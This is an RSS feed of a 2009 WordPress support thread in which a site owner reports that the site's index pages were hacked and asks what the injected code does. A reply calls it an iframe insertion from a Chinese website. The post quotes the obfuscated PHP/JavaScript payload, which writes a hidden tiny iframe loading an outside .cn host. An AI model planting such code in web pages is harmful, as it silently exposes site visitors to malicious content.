<?xml version="1.0" encoding="UTF-8"?><!-- generator="bbPress" -->

<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
>

<channel>
<title>WordPress &#8250; Support Topic: PHP Security Hole?</title>
<link>http://wordpress.org/support/</link>
<description>WordPress &#8250; Support Topic: PHP Security Hole?</description>
<language>en</language>
<pubDate>Thu, 26 Nov 2009 13:14:27 +0000</pubDate>

<item>
<title>iridiax on "PHP Security Hole?"</title>
<link>http://wordpress.org/support/topic/286582#post-1126156</link>
<pubDate>Sat, 04 Jul 2009 19:53:10 +0000</pubDate>
<dc:creator>iridiax</dc:creator>
<guid isPermaLink="false">1126156@http://wordpress.org/support/</guid>
<description>&#60;p&#62;It's an iframe insertion from a Chinese website. For more info, see:&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://wordpress.org/support/topic/281767&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/support/topic/281767&#60;/a&#62;
&#60;/p&#62;</description>
</item>
<item>
<title>DVeditor on "PHP Security Hole?"</title>
<link>http://wordpress.org/support/topic/286582#post-1125964</link>
<pubDate>Sat, 04 Jul 2009 16:00:45 +0000</pubDate>
<dc:creator>DVeditor</dc:creator>
<guid isPermaLink="false">1125964@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hey all,&#60;/p&#62;
&#60;p&#62;Logged in this morning to see our index pages had been altered...the end of each had this code attached:&#60;/p&#62;
&#60;p&#62;&#60;code&#62;&#38;lt;?php echo &#38;#39;&#38;lt;script&#38;gt;document.write(&#38;quot;&#38;lt;if&#38;quot;+&#38;#39;&#38;#39;+&#38;#39;ra&#38;#39;+&#38;#39;&#38;#39;+&#38;quot;m&#38;quot;+&#38;#39;e s&#38;#39;+&#38;quot;rc=\&#38;quot;h&#38;quot;+&#38;#39;&#38;#39;+&#38;#39;tt&#38;#39;+&#38;quot;p:&#38;quot;+&#38;#39;&#38;#39;+&#38;quot;/&#38;quot;+&#38;#39;&#38;#39;+&#38;#39;/mic&#38;#39;+&#38;quot;roso&#38;quot;+&#38;#39;t&#38;#39;+&#38;#39;&#38;#39;+&#38;#39;f.c&#38;#39;+&#38;quot;n&#38;quot;+&#38;#39;/&#38;#39;+&#38;quot;\&#38;quot; wid&#38;quot;+&#38;#39;&#38;#39;+&#38;#39;th=1 he&#38;#39;+&#38;quot;igh&#38;quot;+&#38;#39;&#38;#39;+&#38;#39;t&#38;#39;+&#38;quot;=&#38;quot;+&#38;quot;2&#38;gt;&#38;lt;/i&#38;quot;+&#38;#39;&#38;#39;+&#38;quot;f&#38;quot;+&#38;quot;ra&#38;quot;+&#38;#39;&#38;#39;+&#38;quot;&#38;quot;+&#38;#39;&#38;#39;+&#38;quot;me&#38;quot;+&#38;#39;&#38;gt;&#38;#39;);&#38;lt;/script&#38;gt;&#38;#39;; ?&#38;gt;&#60;/code&#62;&#60;/p&#62;
&#60;p&#62;Any ideas what this was intending to do?  I'm patching to the latest version now, but for a non-destructive hack it was pretty disruptive.  Basically rendered the entire index file useless.&#60;/p&#62;
&#60;p&#62;If anyone has any ideas please let me know!
&#60;/p&#62;</description>
</item>

</channel>
</rss>
